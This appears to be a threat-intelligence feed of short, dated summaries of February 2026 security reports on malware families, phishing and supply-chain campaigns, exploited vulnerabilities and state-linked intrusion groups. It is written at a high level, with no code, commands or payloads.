(Don't) TrustConnect: It's a RAT in an RMM hat
released on 2026-02-19 @ 11:10:30 AM
A new malware-as-a-service (MaaS) called TrustConnect has been discovered masquerading as a legitimate remote monitoring and management (RMM) tool. The malware, classified as a remote access trojan (RAT), uses a fake business website as its command and control center and MaaS portal. Priced at $300 per month, it offers features like a web-based C2 dashboard, automated payload generation with digital signatures, and remote desktop capabilities. The malware has been distributed through various email campaigns, often alongside legitimate RMM tools. Proofpoint researchers identified links between TrustConnect's creator and previous users of Redline stealer. The emergence of this new MaaS demonstrates the ongoing evolution of the cybercrime market and the thriving ecosystem of RMM abuse.
Uncovering Malicious OAuth Campaigns in Entra ID
released on 2026-02-19 @ 11:04:36 AM
This analysis reveals the growing threat of malicious OAuth applications in Microsoft Entra ID, which attackers use for persistence and privilege escalation. The report details how these apps blend in with legitimate integrations, making detection challenging. It describes the creation of OAuth Apps Scout, an automated detection pipeline that identifies emerging malicious OAuth apps. The research uncovered multiple campaigns, including one involving 19 apps impersonating well-known brands. The report compares tactics from 2019 to 2025, showing an evolution in attacker strategies from Microsoft impersonation to third-party SaaS spoofing. It concludes with actionable defense strategies for organizations to protect against these threats.
When your IPTV app terminates your savings
released on 2026-02-19 @ 11:04:35 AM
A new Android banking Trojan named Massiv has been discovered, posing a significant threat to mobile banking users. This malware allows remote control of infected devices and enables Device Takeover attacks, leading to fraudulent transactions from victims' accounts. Massiv is distributed through side-loading, often masquerading as IPTV applications. It features overlay functionality, keylogging, and SMS/Push message interception to steal sensitive data. The malware has targeted government applications and digital identity wallets, particularly in Portugal. Massiv supports screen streaming and UI-tree modes for remote control, bypassing screen capture protections. The trend of malware masquerading as IPTV apps is increasing, exploiting users' willingness to install from unofficial sources.
Remcos Revisited: Inside the RAT's Evolving Command-and-Control Techniques
released on 2026-02-18 @ 04:50:29 PM
This analysis examines the evolution of Remcos, a Remote Access Trojan that has become a significant global threat. Originally a commercial tool, Remcos now provides attackers with capabilities such as credential theft, keylogging, screen capture, and webcam control. The latest variant exhibits real-time command-and-control communication, enabling immediate surveillance. The malware uses sophisticated techniques like dynamic API resolution, encrypted configurations, and modular plugins to evade detection. It establishes persistence through registry modifications and employs cleanup routines to remove traces of its activity. The report details Remcos' infection vectors, data exfiltration methods, and its network interactions with command-and-control servers.
Cryptojacking Campaign Exploits Driver to Boost Monero Mining
released on 2026-02-18 @ 04:50:28 PM
A sophisticated cryptojacking campaign has been discovered, spreading through pirated software installers. The operation utilizes a customized XMRig miner and a controller component for long-term system access. Unlike browser-based schemes, this campaign deploys system-level malware using deceptive installers masquerading as office software. The modular design enhances resilience, with multiple watchdog processes for persistence. A notable feature is the exploitation of a vulnerable signed driver (CVE-2020-14979) to gain kernel-level access, boosting Monero mining performance by 15% to 50%. The campaign connects to the Kryptex mining pool and uses a Monero wallet for payouts. Organizations are advised to enable Microsoft's vulnerable driver blocklist and implement other protective measures.
Law Firm Sites Hijacked in Suspected Supply-Chain Attack
released on 2026-02-18 @ 04:28:07 PM
GrayCharlie, a threat actor active since mid-2023, compromises WordPress sites to inject links redirecting visitors to NetSupport RAT payloads via fake browser updates or ClickFix mechanisms. These infections often lead to Stealc and SectopRAT deployments. The group's infrastructure is primarily linked to MivoCloud and HZ Hosting Ltd. A cluster of US law firm sites was compromised around November 2025, possibly through a supply-chain attack. GrayCharlie uses two main attack chains: one involving fake browser updates and another using ClickFix-style lures. The group's objectives appear to focus on data theft and financial gain, with potential access selling to other threat actors.
Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day
released on 2026-02-18 @ 12:11:56 PM
UNC6201, a suspected PRC-nexus threat group, has been exploiting a zero-day vulnerability (CVE-2026-22769) in Dell RecoverPoint for Virtual Machines since mid-2024. The group uses this flaw for lateral movement, persistent access, and deployment of malware including SLAYSTYLE, BRICKSTORM, and a new backdoor called GRIMBOLT. GRIMBOLT, written in C# and compiled using native AOT, represents a shift in tradecraft designed to complicate analysis and improve performance. The actors also employed novel tactics to pivot into VMware infrastructure, including 'Ghost NICs' creation and iptables for Single Packet Authorization. Dell has released patches for the vulnerability, and the post provides detailed technical analysis, detection opportunities, and hardening guidance.
Spam Campaign Abuses Atlassian Jira, Targets Government and Corporate Entities
released on 2026-02-18 @ 12:11:56 PM
A sophisticated spam campaign exploited Atlassian Jira Cloud to bypass security controls and target government and corporate entities. The attackers used legitimate Atlassian Cloud infrastructure to create disposable Jira instances, leveraging the platform's trusted domain reputation. The campaign targeted specific language groups, including English, French, German, Italian, Portuguese, and Russian speakers, with tailored emails redirecting to investment scams and online casinos. The operation demonstrated high automation and abuse of SaaS workflows, highlighting the need for reassessing trust assumptions in cloud-generated emails. The campaign utilized Keitaro Traffic Distribution System for redirects and focused on organizations already using Atlassian Jira, exploiting their familiarity with Jira-related emails.
Critical Vulnerabilities in Ivanti EPMM Exploited
released on 2026-02-18 @ 02:31:55 AM
Two critical zero-day vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile are being actively exploited, allowing unauthenticated remote code execution on servers. Widespread exploitation has been observed, including reverse shells, web shells, reconnaissance, and malware downloads. Affected sectors include government, healthcare, manufacturing, and technology in multiple countries. Over 4,400 vulnerable instances have been identified. Attackers are moving quickly from initial access to deploying persistent backdoors. Immediate patching is strongly recommended, as exploitation attempts are largely automated and opportunistic.
BADIIS to the Bone: New Insights to a Global SEO Poisoning Campaign
released on 2026-02-17 @ 05:59:21 PM
A Chinese-speaking cybercrime group, REF4033, has orchestrated a massive SEO poisoning campaign, compromising over 1,800 Windows web servers worldwide using the BADIIS malware. The campaign operates in two phases: serving keyword-stuffed HTML to search engine crawlers and redirecting victims to illicit websites. The group deploys BADIIS, a malicious IIS module, to hijack legitimate servers for manipulating search engine rankings and facilitating financial fraud. The campaign primarily targets the APAC region, with China and Vietnam accounting for 82% of compromised servers. Victims span various sectors, including government agencies, educational institutions, and financial services. The attackers use sophisticated techniques for stealth and anti-tampering, employing Chinese encryption standards and commercial obfuscation tools.
How ClickFix Opens the Door to Stealthy StealC Information Stealer
released on 2026-02-17 @ 05:58:09 PM
This analysis examines a sophisticated attack chain targeting Windows systems through social engineering. It uses fake CAPTCHA verification pages to trick users into executing malicious PowerShell commands. The multi-stage infection process ultimately deploys the StealC information stealer, a commodity malware designed to harvest sensitive data. The attack chain includes PowerShell scripts, position-independent shellcode, and a PE downloader, utilizing techniques like reflective PE loading, API hashing, and process injection to evade detection. StealC's capabilities include stealing browser credentials, cryptocurrency wallets, Steam accounts, Outlook credentials, and system information. The malware uses encrypted C2 communication and operates without persistence, making it particularly stealthy.
The tablet conqueror and the links between major Android botnets
released on 2026-02-17 @ 12:39:08 PM
A new Android backdoor called Keenadu has been discovered embedded in the firmware of several tablet brands. It infects the libandroid_runtime.so library during firmware building, injecting itself into every app launched on the device. Keenadu provides attackers unrestricted control over victims' devices, primarily for ad fraud purposes. The investigation revealed connections between Keenadu and other major Android botnets like Triada, BADBOX, and Vo1d. The malware was found in system apps, Google Play apps, and modified versions of popular apps. Over 13,000 users worldwide have been affected, with Russia, Japan, Germany, Brazil and the Netherlands seeing the highest number of infections.
Nation-State Actors Exploit Notepad++ Supply Chain
released on 2026-02-16 @ 02:29:00 PM
A state-sponsored threat group known as Lotus Blossom compromised the official hosting infrastructure for Notepad++ between June and December 2025. The attackers hijacked traffic to the update server, allowing them to selectively target specific users, primarily in Southeast Asia across government, telecommunications and critical infrastructure sectors. Two infection chains were identified - one using Lua script injection to deliver Cobalt Strike and another using DLL side-loading to deploy a Chrysalis backdoor. The campaign affected additional sectors in South America, US, Europe and Southeast Asia including cloud hosting, energy, financial, government, manufacturing and software development. The sophisticated supply chain attack leveraged insufficient verification controls in older versions of the Notepad++ updater.
Fake AI Assistant Extensions Targeting 260,000 Chrome Users via injected iframes
released on 2026-02-16 @ 02:28:59 PM
A coordinated campaign of Chrome extensions posing as AI assistants has been uncovered, affecting over 260,000 users. These extensions, while appearing legitimate, embed remote, server-controlled interfaces inside extension-controlled surfaces, granting access to sensitive browser capabilities. The campaign consists of 30 different extensions sharing the same codebase, permissions, and backend infrastructure. Key features include remote iframe as the core UI, page content extraction, voice recognition capability, and Gmail integration. The extensions communicate with infrastructure under the tapnetic.pro domain, using subdomain segmentation for logical separation. The campaign employs extension spraying tactics to evade takedowns and quickly restore distribution. This approach breaks the browser security model, potentially allowing data harvesting and user behavior monitoring.
Operation MacroMaze: New APT28 Campaign Using Basic Tooling and Legitimate Infrastructure
released on 2026-02-16 @ 02:28:58 PM
Operation MacroMaze, attributed to APT28 (Fancy Bear), targets entities in Western and Central Europe from September 2025 to January 2026. The campaign utilizes basic tools and legitimate services for infrastructure and data exfiltration. Multiple documents with varying macro variants act as droppers, establishing a foothold by creating files in the %USERPROFILE% folder. The attack chain involves VBScript execution, scheduled task creation for persistence, and a multi-stage process using batch files. Exfiltration is achieved through HTML-based techniques, leveraging webhook.site for data transmission. Despite its simplicity, the campaign demonstrates effective operational tradeoffs, making detection and attribution challenging.
Lumma Stealer and Ninja Browser malware campaign abusing Google Groups
released on 2026-02-16 @ 10:44:41 AM
A malicious campaign exploiting Google Groups to distribute Lumma Stealer and Ninja Browser malware has been uncovered. The attackers infiltrate industry-related forums, posting seemingly legitimate technical discussions with embedded malicious download links. For Windows users, the payload is Lumma Stealer, a credential-harvesting malware. Linux users are directed to download a trojanized Chromium-based browser called Ninja Browser, which installs malicious extensions and persistence mechanisms. The campaign utilizes Google's trusted ecosystem to bypass security measures and increase user confidence. Over 4,000 malicious Google Groups and 3,500 Google-hosted URLs have been identified in this global operation, posing significant risks to organizations including credential theft, account takeover, and remote command execution.
Phishing on the Edge of the Web and Mobile Using QR Codes
released on 2026-02-14 @ 03:41:01 AM
This article explores the misuse of QR codes in phishing attacks, focusing on three key areas: QR codes with URL shorteners concealing malicious destinations, in-app deep links used to steal credentials and control victims' apps, and QR codes bypassing app store security via direct malicious app downloads. The research reveals an average of 11,000 daily detections of malicious QR codes, with financial services being the most targeted industry. Attackers are leveraging QR code shorteners, in-app deep links, and direct downloads to evade security controls and exploit users' trust in QR codes. The article highlights specific attack scenarios, including account takeovers through messaging apps and distribution of suspicious gambling apps.
Attackers Weaponize RMM Tools via Zoom, Meet, & Teams Lures
released on 2026-02-13 @ 09:23:27 AM
Netskope Threat Labs has identified multiple phishing campaigns exploiting video conference invitations from Zoom, Microsoft Teams, and Google Meet. The attackers use fake meeting invites to trick users into downloading malicious payloads disguised as software updates. These payloads are actually legitimate, digitally signed remote monitoring and management (RMM) tools like Datto RMM, LogMeIn, or ScreenConnect. By leveraging these tools, attackers gain administrative remote access to victims' machines, potentially leading to data theft or further malware deployment. The campaigns use convincing phishing pages that mimic legitimate video conferencing platforms, exploiting users' urgency to join scheduled calls. This sophisticated approach allows attackers to bypass traditional security measures and establish a persistent foothold in corporate networks.
Multiple Threat Actors Rapidly Exploit React2Shell: A Case Study of Active Compromise
released on 2026-02-13 @ 09:23:25 AM
A critical vulnerability in React Server Components, dubbed React2Shell, was disclosed on December 3, 2025. Within days, multiple threat actors exploited this flaw, leading to simultaneous compromises of affected systems. The case study reveals a rapid progression from initial coin miner installations to the deployment of various malware types, including RATs and backdoors. The timeline shows attacks beginning on December 5, with website defacement occurring by December 7. Notably, the incident involved the use of SNOWLIGHT, HISONIC backdoor, CrossC2 RAT, and the abuse of Global Socket tool. The study emphasizes the speed at which attackers exploit new vulnerabilities and the importance of swift patching and thorough post-compromise investigations.
LockBit strikes with new 5.0 version, targeting Windows, Linux and ESXI systems
released on 2026-02-12 @ 03:08:39 PM
LockBit 5.0, the latest version of the notorious ransomware, has been released with support for Windows, Linux, and ESXi systems. This update brings improved defense evasion, faster encryption, and enhanced modularity. The Windows variant employs extensive anti-analysis techniques, while Linux and ESXi versions remain unpacked. All variants share a common encryption scheme using XChaCha20 and Curve25519. LockBit 5.0 demonstrates a focus on enterprise and infrastructure targets, including explicit support for Proxmox virtualization. The group's data leak site reveals a primary focus on the U.S. business sector, with victims spanning various industries. LockBit's infrastructure has shown connections to SmokeLoader, suggesting possible cooperation or infrastructure reuse among malware operators.
ScreenConnect Attack: SmartScreen Bypass and RMM Abuse
released on 2026-02-12 @ 10:39:02 AM
An attack campaign targeting organizations in the US, Canada, UK, and Northern Ireland exploits ConnectWise ScreenConnect vulnerabilities. The attack chain begins with a spoofed email containing a malicious .cmd attachment, which executes silently, escalates privileges, disables Windows SmartScreen, and removes the Mark-of-the-Web. It then installs a legitimate Remote Monitoring and Management tool, ScreenConnect, which is abused as a Remote Access Trojan for persistent command-and-control access. The campaign focuses on sectors with high-value data, including government, healthcare, and logistics. The attackers use various techniques to evade detection, including UAC bypass, registry modification, and silent MSI installation. The ScreenConnect client used has a revoked certificate, highlighting the importance of blocking vulnerable software versions and enforcing strict RMM allowlists.
Employee Monitoring and SimpleHelp Software Abused in Ransomware Operations
released on 2026-02-12 @ 10:39:01 AM
Threat actors have been observed exploiting Net Monitor for Employees Professional and SimpleHelp software in ransomware operations. These legitimate tools were used for remote access, command execution, and persistence. The attackers disguised Net Monitor as Microsoft OneDrive and configured SimpleHelp with cryptocurrency-related keyword triggers. In one case, the attack led to an attempted deployment of Crazy ransomware. The intrusions involved initial access through compromised VPN accounts, followed by the installation of these tools for remote control and monitoring. The shared infrastructure and tactics suggest a single threat actor or group behind these activities, with objectives including cryptocurrency theft and ransomware deployment.
Fake 7-Zip downloads are turning home PCs into proxy nodes
released on 2026-02-12 @ 09:29:41 AM
A convincing lookalike of the popular 7-Zip archiver site has been serving a trojanized installer that silently converts victims' machines into residential proxy nodes. The fake site, 7zip[.]com, distributes a functional copy of 7-Zip alongside concealed malware. The malware deploys three components: Uphero.exe (service manager), hero.exe (proxy payload), and hero.dll (supporting library). It establishes persistence through Windows services, manipulates firewall rules, and profiles the host system. The primary function is to enroll infected hosts as residential proxy nodes, allowing third parties to route traffic through victims' IP addresses. This campaign appears to be part of a broader operation with similar tactics used for other fake installers. The malware incorporates multiple evasion techniques and uses encrypted communications.
Nation-State Actors Exploit Notepad++ Supply Chain
released on 2026-02-12 @ 01:20:03 AM
Between June and December 2025, state-sponsored threat group Lotus Blossom compromised the hosting infrastructure for Notepad++, allowing them to intercept and redirect update traffic. This enabled selective targeting of users primarily in Southeast Asian government, telecommunications and critical infrastructure sectors. Two infection chains were identified - one using Lua script injection to deliver Cobalt Strike and another using DLL side-loading for a Chrysalis backdoor. The campaign affected additional sectors across South America, US, Europe and Southeast Asia including cloud hosting, energy, financial, government, manufacturing and software development. The attack exploited insufficient verification in older versions of the Notepad++ updater to serve malicious installers to targeted victims.
The game is over: when “free” comes at too high a price. What we know about RenEngine
released on 2026-02-11 @ 04:29:19 PM
A widespread campaign is distributing the RenEngine loader malware disguised as pirated games and software. The loader uses a modified Ren'Py game engine to deliver payloads like Lumma and ACR stealers. It employs sophisticated techniques including sandbox evasion, process injection, and modular design. The infection chain involves decrypting and launching malicious code through legitimate applications. RenEngine has affected users globally, with Russia, Brazil, Turkey, Spain and Germany most impacted. The campaign highlights risks of pirated software and the need for robust security measures.
A Peek Into Muddled Libra's Operational Playbook
released on 2026-02-11 @ 03:22:17 AM
Unit 42 discovered a rogue virtual machine used by the cybercrime group Muddled Libra during an incident response investigation. The VM provided insights into the group's operational methods, including reconnaissance, tool downloads, persistence establishment, certificate theft, and interactions with the target's infrastructure. Muddled Libra created the VM after gaining unauthorized access to the target's VMware vSphere environment. The group's tactics involve minimal malware use, preferring to leverage the target's assets. Their attack chain included creating a VM, downloading tools, establishing C2, using stolen certificates, and attempting data exfiltration. The article details the group's activities, tools used, and troubleshooting efforts during the attack.
Deep Dive into New XWorm Campaign Utilizing Multiple-Themed Phishing Emails
released on 2026-02-10 @ 06:02:36 PM
A sophisticated phishing campaign delivering XWorm RAT has been identified. The attack chain begins with themed emails containing malicious Excel attachments exploiting CVE-2018-0802. When opened, the file downloads an HTA file, which executes PowerShell code to retrieve a fileless .NET module. This module then uses process hollowing to inject the XWorm payload into Msbuild.exe. XWorm 7.2 employs encrypted C2 communication and offers extensive features through plugins, including system control, data theft, DDoS capabilities, and ransomware functionality. The analysis reveals XWorm's modular architecture and advanced evasion techniques, highlighting it as a significant threat.
AI/LLM-Generated Malware Used to Exploit React2Shell
released on 2026-02-10 @ 05:46:08 PM
Darktrace identified an AI-generated malware sample exploiting the React2Shell vulnerability in its honeypot environment. The incident demonstrates how LLM-assisted development enables low-skill attackers to rapidly create effective exploitation tools. The attack chain involved spawning a container named 'python-metrics-collector' on an exposed Docker daemon, downloading and executing a Python script, and deploying a XMRig crypto miner. The malware sample featured thorough code documentation and lacked typical obfuscation, indicating AI generation. This highlights the growing trend of AI-enabled cyber threats that are now operational and accessible to anyone, posing new challenges for defenders.
VoidLink: Dissecting an AI-Generated C2 Implant
released on 2026-02-10 @ 05:46:07 PM
VoidLink is a Linux C2 framework that generates implant binaries for cloud and enterprise environments. The implant, likely built using an LLM coding agent, demonstrates advanced capabilities including multi-cloud targeting, container awareness, and kernel-level stealth. It fingerprints cloud environments across AWS, GCP, Azure, Alibaba Cloud, and Tencent Cloud, harvesting credentials and detecting container runtimes. The malware includes plugins for container escape and Kubernetes privilege escalation, as well as a kernel-level rootkit that adapts its approach based on the host's kernel version. C2 communications use AES-256-GCM over HTTPS, disguised as normal web traffic. VoidLink highlights the growing concern of LLM-generated implants reducing the skill barrier for producing sophisticated malware.
Storm-2603 Exploits CVE-2026-23760 to Stage Warlock Ransomware
released on 2026-02-10 @ 04:59:01 PM
A critical vulnerability in SmarterMail email server software (CVE-2026-23760) is being actively exploited by the China-based threat actor Storm-2603. The group uses this vulnerability to bypass authentication, reset administrator passwords, and gain full system control through the software's 'Volume Mount' feature. They then install Velociraptor, a legitimate digital forensics tool, to maintain access and prepare for deploying their Warlock ransomware. The attack chain involves exploiting the password reset API, abusing administrative features, and using legitimate tools to blend in with normal activity. This sophisticated approach allows the group to bypass detection mechanisms and establish persistence. The report also notes simultaneous exploitation attempts of another vulnerability (CVE-2026-24423) against the same targets, highlighting the urgent need for patching and improved security measures.
Silent Push Traffic Origin Data Combined with Residential Proxy Data Uncovers Suspicious Chinese VPN
released on 2026-02-10 @ 09:09:45 AM
An investigation using Silent Push's Traffic Origin and residential proxy data revealed a suspicious Chinese VPN provider. The analysis focused on IP address 205.198.91.155, which showed unusual traffic from Russia, China, Myanmar, Iran, and Venezuela. This IP was linked to the domain lvcha.in, hosting a Chinese-language VPN. Further investigation uncovered nearly 50 related domains promoting the same VPN, suggesting attempts to bypass country-level firewalls. The VPN's infrastructure was found to use residential proxies and had connections to various high-risk countries. This case study demonstrates the importance of verifying physical and technical behaviors of connections to protect against fraud and state-sponsored actors using stolen identities and spoofed locations.
Cryptocurrency Sector Targeted with New Tooling and AI-Enabled Social Engineering
released on 2026-02-09 @ 07:29:21 PM
North Korean threat actor UNC1069 has evolved its tactics to target the cryptocurrency and decentralized finance sectors. In a recent intrusion, they deployed seven unique malware families, including new tools SILENCELIFT, DEEPBREATH, and CHROMEPUSH, designed to capture host and victim data. The attack utilized social engineering involving a compromised Telegram account, a fake Zoom meeting, and a reportedly AI-generated video. UNC1069 has shifted from spear-phishing to targeting Web3 industry entities like centralized exchanges, software developers, and venture capital firms. The intrusion demonstrated sophisticated techniques to bypass macOS security features and harvest credentials, browser data, and cryptocurrency information. This marks a significant expansion in UNC1069's capabilities and highlights their focus on financial theft and fueling future social engineering campaigns.
Technical Analysis of GuLoader Obfuscation Techniques
released on 2026-02-09 @ 07:07:11 PM
GuLoader, a malware downloader active since 2019, primarily delivers RATs and information stealers. It employs sophisticated anti-analysis techniques, including polymorphic code for dynamic constant construction and complex exception-based control flow obfuscation. The malware has evolved to handle multiple exception types, making tracing its execution flow challenging. GuLoader uses dynamic hashing, encrypted strings, and stack-based string encryption to conceal critical information. It often hosts payloads on trusted cloud services to bypass reputation-based detection. The malware's consistent development and updating of anti-analysis techniques suggest it will remain a significant threat in the future.
Investigation on the EmEditor Supply Chain Cyberattack
released on 2026-02-09 @ 02:52:16 PM
A recent supply chain attack targeting EmEditor users has been uncovered, involving watering hole tactics. The investigation reveals multiple domains masquerading as EmEditor-related sites, all registered through NameSilo LLC in December 2025. The domains resolve to various IP addresses, with some changes observed in February 2026. Additional domains with similar patterns were discovered, along with peculiar HTTP header behavior. A potential early stage of the campaign was identified, sharing similar characteristics with the initial report. The attackers continued their activities even after exposure, utilizing PowerShell scripts and various domains for command and control purposes. The analysis provides a comprehensive list of indicators, including domain names, IP addresses, and file hashes associated with the attack.
A security alert regarding APT-C-28 (ScarCruft) using MiradorShell to launch a cyberattack.
released on 2026-02-09 @ 10:18:26 AM
A recent investigation reveals that the APT-C-28 (ScarCruft) group has expanded its targets to include the cryptocurrency industry. The group employs sophisticated phishing tactics, using LNK files disguised as PDFs to lure victims with investment proposals ranging from $1-3 million. Upon execution, a multi-stage payload deployment occurs, ultimately installing MiradorShell v2.0 to gain system control. The attack chain involves file downloads, decryption, and the creation of scheduled tasks for persistence. MiradorShell, an AutoIt-based backdoor, connects to a command and control server, offering reverse shell capabilities, file management, remote program execution, and victim fingerprinting. The malware employs various evasion techniques, including inline library files and direct API calls.
Tenant from Hell: Prometei's Unauthorized Stay in Your Windows Server
released on 2026-02-09 @ 10:17:27 AM
eSentire's Threat Response Unit detected Prometei botnet activity on a customer's Windows Server in the Construction industry. Prometei, a Russian-origin botnet active since 2016, features remote control, credential harvesting, crypto-mining, lateral movement, and C2 communication over clearweb and TOR. The malware uses complex encryption, including rolling XOR and RC4, for payload decryption and C2 communications. It establishes persistence as a Windows service, creates firewall exceptions, and downloads additional modules for specialized functions like credential theft and TOR routing. The attack likely began with compromised RDP credentials, followed by the execution of a malicious command to download and run the Prometei payload.
Active Exploitation of SolarWinds Web Help Desk (CVE-2025-26399)
released on 2026-02-09 @ 06:01:02 AM
Threat actors are actively exploiting a vulnerability in SolarWinds Web Help Desk, targeting organizations using versions prior to 12.8.7 HF1. The attack chain involves deploying Zoho ManageEngine RMM agents, Velociraptor for command and control, and Cloudflare tunnels for persistence. Attackers use encoded PowerShell commands, disable Windows Defender and Firewall, and implement a C2 failover mechanism. They also utilize Elastic Cloud for data exfiltration and QEMU for SSH backdoor persistence. The earliest known instance of this persistence mechanism was observed on January 16, 2026. Organizations are advised to update their SolarWinds Web Help Desk, restrict administrative interface access, reset credentials, and review hosts for unauthorized tools and suspicious activities.
Attacks in Russia and Uzbekistan: NetSupport RAT and potential IoT interest
released on 2026-02-05 @ 08:23:35 PM
Stan Ghouls, a cybercriminal group also known as Bloody Wolf, has been conducting targeted attacks against organizations in Russia, Uzbekistan, and other Central Asian countries since 2023. Their latest campaign primarily focused on Uzbekistan, with about 50 victims identified, along with 10 in Russia and a few others in neighboring countries. The attackers use spear-phishing emails with malicious PDF attachments to deliver a Java-based loader, which then installs the NetSupport remote access tool. The group targets manufacturing, finance, and IT sectors, possibly for financial gain and espionage. New evidence suggests Stan Ghouls may be expanding into IoT-based threats, as Mirai malware files were found on a server linked to their previous campaigns.
Black Basta: Defense Evasion Capability Embedded in Ransomware Payload
released on 2026-02-05 @ 08:21:26 PM
A recent Black Basta ransomware campaign incorporated a bring-your-own-vulnerable-driver (BYOVD) defense evasion component within the payload itself, a departure from typical practices. The ransomware exploited a vulnerable NsecSoft NSecKrnl driver to terminate security processes. This approach, previously seen in Ryuk and Obscura attacks, may indicate a trend towards bundling additional capabilities in ransomware payloads. The attack also involved a long dwell time and post-deployment activity using GotoHTTP. The Cardinal group, responsible for Black Basta, had been quiet following a chat log leak in 2025 but appears to be resuming activities. This development raises questions about future ransomware tactics and the potential advantages of embedding defense evasion capabilities within payloads.
The Shadow Campaigns: Uncovering Global Espionage
released on 2026-02-05 @ 08:20:39 PM
This investigation reveals a new cyberespionage group tracked as TGR-STA-1030, believed to be a state-aligned actor operating from Asia. Over the past year, the group has compromised government and critical infrastructure organizations in 37 countries, targeting ministries, law enforcement agencies, and departments related to economic, trade, and diplomatic functions. The group employs sophisticated phishing and exploitation techniques, leveraging various tools and infrastructure to maintain persistent access. Their activities span across the Americas, Europe, Asia, Oceania, and Africa, with a focus on countries exploring certain economic partnerships. The group's operations often coincide with significant geopolitical events and economic interests, particularly in sectors like rare earth minerals and international trade agreements.
Knife Cutting the Edge: Disclosing a China-nexus gateway-monitoring AitM framework
released on 2026-02-05 @ 08:16:27 PM
Cisco Talos uncovered 'DKnife', a sophisticated gateway-monitoring and adversary-in-the-middle (AitM) framework comprising seven Linux-based implants. Used since 2019, DKnife performs deep-packet inspection, traffic manipulation, and malware delivery via routers and edge devices. It targets various devices, including PCs, mobile devices, and IoT, delivering ShadowPad and DarkNimbus backdoors. The framework primarily targets Chinese-speaking users, with evidence suggesting China-nexus threat actors as operators. DKnife's capabilities include DNS hijacking, Android application update hijacking, Windows binary hijacking, anti-virus traffic disruption, and user activity monitoring. A link to the WizardNet campaign was also discovered, indicating a shared development or operational lineage.
Technical Analysis of Marco Stealer
released on 2026-02-05 @ 08:06:40 PM
Marco Stealer, discovered in June 2025, is an information stealer targeting browser data, cryptocurrency wallets, and sensitive files. It employs anti-analysis techniques, string encryption, and terminates security tools. The malware collects system information, exfiltrates browser data using embedded files, and extracts cryptocurrency wallet data from browser extensions. It also targets popular services and cloud storage. Marco Stealer uses AES-256 encryption for C2 communication over HTTP. Despite recent law enforcement actions against similar threats, information stealers continue to pose significant risks to corporate environments.
New Clickfix variant 'CrashFix' deploying Python Remote Access Trojan
released on 2026-02-05 @ 08:01:03 PM
A new evolution in the ClickFix campaign, dubbed CrashFix, has been identified. This variant deliberately crashes victims' browsers and uses social engineering to lure users into executing malicious commands. The attack begins with a malicious ad redirecting users to install a harmful browser extension impersonating a legitimate ad blocker. The payload causes delayed browser issues and presents a fake security warning. It misuses the Windows utility finger.exe to execute malicious commands and downloads additional payloads, including a Python-based Remote Access Trojan (RAT). The RAT, named ModeloRAT, establishes persistence and performs extensive reconnaissance. The campaign targets domain-joined systems and employs multiple obfuscation techniques to evade detection.
They Got In Through SonicWall. Then They Tried to Kill Every Security Tool
released on 2026-02-04 @ 08:22:35 PM
In early February 2026, an intrusion was detected where threat actors exploited compromised SonicWall SSLVPN credentials for initial network access. The attackers deployed an EDR killer utilizing a legitimate but revoked EnCase forensic driver to terminate security processes from kernel mode. This technique, known as Bring Your Own Vulnerable Driver (BYOVD), bypasses Windows Driver Signature Enforcement. The attack was halted before ransomware deployment, but it highlights the growing trend of weaponizing signed, legitimate drivers to disable endpoint security. The intrusion involved aggressive network reconnaissance, deployment of a sophisticated EDR killer with an encoded kernel driver payload, and attempts to establish persistence. The case underscores the importance of multi-factor authentication, VPN log monitoring, and implementing Microsoft's recommended driver block rules.
Amaranth-Dragon: Weaponizing CVE-2025-8088 for Targeted Espionage in Southeast Asia
released on 2026-02-04 @ 03:57:24 PM
A Chinese threat actor, Amaranth-Dragon, has been conducting highly targeted cyber-espionage campaigns against government and law enforcement agencies in Southeast Asia throughout 2025. The group swiftly exploited the CVE-2025-8088 vulnerability in WinRAR to deliver malicious payloads, including a custom loader and the Havoc C2 Framework. Their operations demonstrate sophisticated tactics, including geo-restricted command and control servers, use of legitimate hosting services, and a new Telegram-based remote access trojan. The campaigns coincide with significant local geopolitical events, increasing the likelihood of successful compromises. Technical analysis reveals similarities with APT-41, suggesting a possible connection or shared resources between the groups.
AI-assisted cloud intrusion achieves admin access in 8 minutes
released on 2026-02-04 @ 03:57:23 PM
An AWS environment was targeted in a sophisticated attack, with the threat actor gaining administrative privileges in under 10 minutes. The operation showed signs of leveraging large language models for automation and decision-making. Initial access was obtained through credentials found in public S3 buckets, followed by rapid privilege escalation via Lambda function code injection. The attacker moved laterally across 19 AWS principals, abused Amazon Bedrock for LLMjacking, and launched GPU instances for potential model training. The attack involved extensive reconnaissance, data exfiltration, and attempts to establish persistence. Notable techniques included IP rotation, role chaining, and the use of AI-generated code.
New year, new sector: Targeting India's startup ecosystem
released on 2026-02-04 @ 03:57:22 PM
Transparent Tribe, also known as APT36, has expanded its targeting to include India's startup ecosystem, particularly those in the cybersecurity domain. The group is using startup-oriented themed lure material delivered via ISO container-based files to deploy Crimson RAT. This campaign deviates from their typical government and defense targets, suggesting a shift in strategy towards companies providing open-source intelligence services and collaborating with law enforcement agencies. The attack chain involves spear-phishing emails, malicious LNK files, and batch scripts to execute the Crimson RAT payload. The malware employs extensive obfuscation techniques and uses a custom TCP protocol for command and control communications. This activity demonstrates the group's adaptation of proven tooling for new victim profiles while maintaining its core behavioral tactics, techniques, and procedures.
Compromised Routers, DNS, and a TDS Hidden in Aeza Networks
released on 2026-02-04 @ 03:26:43 PM
A shadow DNS network and HTTP-based traffic distribution system (TDS) hosted in Aeza International, a sanctioned bulletproof hosting company, has been discovered. The system compromises routers, altering their DNS settings to use shadow resolvers. These resolvers selectively modify responses, directing users to malicious content. The TDS incorporates a clever DNS trick to evade detection by security groups. The system, operational since mid-2022, appears to be run by a financially motivated actor in affiliate marketing. It has the potential to interfere with devices on the network, alter DNS records, and conduct adversary-in-the-middle operations. The threat actor's ability to control DNS resolution poses significant risks beyond delivering unwanted advertising.
Punishing Owl Attacks Russia: A New Owl in the Hacktivists' Forest
released on 2026-02-04 @ 03:26:42 PM
A new hacking group called Punishing Owl has emerged, targeting Russian critical infrastructure. Their first attack on December 12, 2025, compromised a Russian state security agency, leaking internal documents. The group used DNS manipulation, created fake subdomains, and sent phishing emails to the victim's partners. They employed a PowerShell stealer called ZipWhisper to exfiltrate browser data. Punishing Owl's attacks are politically motivated and focus exclusively on Russian targets, including government agencies, scientific institutions, and IT organizations. The group has established a presence on cybercriminal forums and social media, likely operating from Kazakhstan. Experts predict this group will continue to be a persistent threat in Russian cyberspace.
